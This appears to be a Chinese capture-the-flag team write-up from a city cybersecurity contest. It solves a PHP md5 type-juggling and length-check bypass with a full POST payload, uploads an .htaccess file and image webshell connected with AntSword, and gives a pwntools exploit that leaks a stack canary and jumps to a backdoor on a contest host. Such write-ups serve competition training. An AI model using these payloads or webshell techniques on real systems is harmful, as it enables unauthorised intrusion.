此次比赛偏中等难度,高级中学十三年团队共解出6题,不过还是乱杀

排名第二,还是很开心的

团队名称:高级中学十三年

解题人:xinyi,糖糖,太阳能

Web

1. ezbyp@ss

  1. <?php
  2. highlight_file(__FILE__);
  3. $status1=false;
  4. $status2=false;
  5. if(isset($_POST['a'])&&isset($_POST['b'])){
  6. $a=$_POST['a'];
  7. $b=$_POST['b'];
  8. if ((md5($a)==md5($b))&&!($a===$b)){
  9. $status1=true;
  10. }
  11. }
  12. if (isset($_POST['password'])){
  13. if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))<8))
  14. {
  15. $status2=true;
  16. } else{
  17. die("please input a legal parameter");
  18. }
  19. }
  20. if ($status1&&$status2){
  21. echo base64_encode(file_get_contents('flag.php'));
  22. }

打开容器以后看到a和b是进行md5碰撞

还要使得a≠b构造a和b    a=QNKCDZO&b=240610708

if (isset($_POST['password'])){
    if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))<8))
    {
        $status2=true;

看到这里发现password即要大于99999999内容长度又要小于8

构造出password是password=1e7%00*-*

最终payload是a=QNKCDZO&b=240610708&password=1e7%00*-*

使用post请求得到一串base64加密的

使用base64解码即可得到flag

Flag: flag{31ad7be2-3b18-414f-be8e-6dea3f8c664b}

2.Ezupload

根据题目给的hint3 .htaccess解析绕过

所以先将.htaccess写出来

先将.htaccess上传

上传成功后我们打开F12

可以看到上传的路径

接下来上传.htaccess写的shell1.jpg

上传成功

现在使用蚁剑连接

连接后在html目录下看到flag.php文件打开就得到flag

Flag: flag{upl0ad_in_my_ctf_challenge}

PWN

  1. Overflow

使用checksec查看发现没有PIE保护

使用ida进行分析

看到第12行get函数存在栈溢出前面输入到but中然后put出来

发现还有一个后门函数

构造出exp

  1. from pwn import *
  2. def printMsg(key,value):
  3. print("\033[1:35m{}==>{}\033[0m".format((key),value))
  4. sys= 0x04012BA
  5. context.log_level='debug'
  6. sh=remote('team.ctf.sierting.com',10051)
  7. sh.send('a'*0x49)
  8. sh.recvline()
  9. sh.recv(0x48)
  10. canary=u64(sh.recv(8)) - 0x61
  11. printMsg('canary',hex(canary))
  12. sh.sendline(b'a' * 0x28 + p64(canary) +p64(0) +p64(sys))
  13. sh.interactive()

运行后输入cat /flag

即可得到flag

Flag:flag{canary-protect-JKjnkBJHm-jBJBIUbjib}

Reverse

  1. flowers pro max

下载附件打开

随便输入以后出现这个点确定以后发现输出了

将那串md5解(4efe4660597da0c41aac0a9870202f19)’

解密后得到Ture

使用die打开然后查找字符串

找到有一串md5加密后的解密发现是True

(f827cf462f62848df37c5e1e94a4da74)

将True输入进附件给的软件里面

发现输出了一个Your Win!!

在刚刚查找字符串是看到这个就打开C盘发现生成了

data_flowers.txt

打开发现文本框的东西这个文件里面也有

打开发现这个字符串包裹上提交

Flag:flag{BBA1JHB58DG}

Misc部分

混乱的base

根据提示发现是爆破base64大小写,脚本如下

import base64text = 'ZMXHZ3TCDXI1DF9ZMF9LEN0='def all_possible(text):res=[""]for i in text:if not i.isalpha():for j in range(len(res)):res[j] += ielse:for k in range(len(res)):tmp = res[k]res[k] += i.lower()res.append(tmp + i.upper())return resdef baopo():k = all_possible(text)res = []for i in k:try:f = base64.b64decode(i + '').decode("utf-8")if(f.isprintable()):res.append(f)except:passfor i in res:print(i)print("[*]一共解出{0}个".format(len(res)))baopo()

运行结果如下

flag{\ur5t_s0_ez}

flGg{\ur5t_s0_ez}

flag{Bur5t_s0_ez}

flGg{Bur5t_s0_ez}

flag{\ur5t_Y0_ez}

flGg{\ur5t_Y0_ez}

flag{Bur5t_Y0_ez}

flGg{Bur5t_Y0_ez}

flag{\ur5t_s0_Kz}

flGg{\ur5t_s0_Kz}

flag{Bur5t_s0_Kz}

flGg{Bur5t_s0_Kz}

flag{\ur5t_Y0_Kz}

flGg{\ur5t_Y0_Kz}

flag{Bur5t_Y0_Kz}

flGg{Bur5t_Y0_Kz}

一共解出16个,发现flag{Bur5t_Y0_ez}符合flag的标准,上交,显示正确

克拉玛依市第一届网络安全技能大赛-团队赛WP相关推荐

  1. qsnctf NoLogin(克拉玛依市第一届网络安全技能大赛) wp

    启动环境 扫个后台路径 没什么有用的消息 尝试sqlmap跑一手 存在漏洞 爆数据库名 爆ctf数据库的表名 字段名 脱库 尝试登录 抓个包 加个xff 成功进入后台 linux系统 尝试ls 读取f ...

  2. 山西省第二届网络安全技能大赛(企业组)部分赛题WP(二)

    前言 有幸参加了2022年山西省第二届网络安全技能大赛企业组的比赛,这是第一次参加ctf比赛,本着积累实战经验的目的去的,竟然排名14,有点意外. 提示:以下是本篇文章正文内容. 一.题目 题目: 现 ...

  3. 山西省第二届网络安全技能大赛(企业组)部分赛题WP(三)

    前言 有幸参加了2022年山西省第二届网络安全技能大赛企业组的比赛,这是第一次参加ctf比赛,本着积累实战经验的目的去的,竟然排名14,有点意外. 提示:以下是本篇文章正文内容. 一.题目 题目: 流 ...

  4. 计算机技能大赛奖品,第一届全国技能大赛都有哪些奖励政策?

    (来源:湖北人社) 原标题:第一届全国技能大赛都有哪些奖励政策? 中华人民共和国第一届职业技能大赛将于今年12月10日-13日在广州举行.本届大赛共设86个竞赛项目.其中,世赛选拔项目设63个竞赛项目 ...

  5. 第二届全国计算机安全技能比赛,第2届网络安全技能大赛试题(2018年).PDF

    第2届网络安全技能大赛试题(2018年) 第2 届网络安全技能大赛试题(2018 年) 一.选择题(每题1 分,共50 分) 1.网络的链路层中,以( )作为数据的传输单位. A. 比特 B.数据帧 ...

  6. 技能竞赛国赛_中西部第一!技能“川军”在第一届全国技能大赛斩获4金5银6铜...

    12月13日,中华人民共和国第一届职业技能大赛在广东省广州市闭幕.红星新闻记者从四川省人社厅获悉,四川代表团共斩获4枚金牌.5枚银牌.6枚铜牌和36个优胜奖,39人成绩位居全国前十,34名选手将入围第 ...

  7. 项目日报模板_第一届全国技能大赛现场直击:混凝土建筑项目全场最“高”

    大洋网讯 混凝土建筑项目的比赛场馆位于室外,高达12米,让这个项目成为全场最"高"项目."在现代化大型工地,都是用泵车浇灌混凝土,我们这里比赛也模拟了这一个工地的现实场景 ...

  8. 西安邮电大学第三届网络安全技能大赛---PWN方向WP

    ezshell 查看bin目录发现只能执行五个指令nl,cd,ls,chmod,chattr nl可以来查看文件内容,flag被分成了两部分,逐个文件查找flag即可 ezrop 开启了沙箱,禁用了e ...

  9. 2018第四届美亚杯全国电子数据取证大赛团队赛wp

    话不多说,案情

最新文章

  1. 随动系统控制c语言源程序,基于DSP的小功率随动系统的控制器设计及优化
  2. jq 比较两个时间是否在同一天_.NET CORE下最快比较两个文件内容是否相同的方法...
  3. ipv6 端口号_计算机网络之IP、MAC、端口号、子网掩码、默认网关、DNS
  4. C#之基本知识和语法3 - 数据类型
  5. html 如何去除浮动,CSS浮动? 如何清除浮动?
  6. ubuntu 14.04 java_Ubuntu14.04下配置Java环境
  7. 一些数据链路层的题目
  8. linux资源异常无法fork,linux 下 fork 后的文件资源处理问题
  9. SpringBoot整合Sharding-JDBC实现水平分表
  10. Jvisualvm设置中文
  11. 计算机组成原理与汇编语言试题,2069电大《计算机组成原理与汇编语言》试题和答案2005...
  12. 小程序授权登录并获取手机号
  13. 基于Java的电子会议预约管理系统
  14. Java程序:迷宫地图生成器
  15. python中位数代码_python求中位数
  16. 如何写简历才能够突显自己的厉害之处?
  17. 变压器绕制工艺之分布电容
  18. Android studio app启动时默认启动页面为自定义界面
  19. sequence_loss_by_example()函数在Tensorflow2.x找不到
  20. python设计模式篇3---创建型模式

热门文章

  1. 广电“科技少年”科普大赛在广州紫泥堂基地圆满闭幕
  2. Elasticsearch的安装部署
  3. madVR+potplay 基本设置
  4. Windows看门狗(watchdog)软件AlwaysUp使用与下载
  5. 【黑马Android】(11)音乐播放器/视频播放器/照相机/常见对话框/notification通知/样式和主题/帧动画/传感器/应用程序反编译与安装
  6. C# 调用mysql存储过程
  7. php实现和MySQL实现评论_仿网易评论盖楼PHP+Mysql实现
  8. ubuntu14.04下公式编辑器libreoffice math安装
  9. 怎么找回PDF文件的打开密码
  10. 2023年6月中国数据库排行榜:OceanBase 连续七月踞榜首,华为阿里谋定快动占先机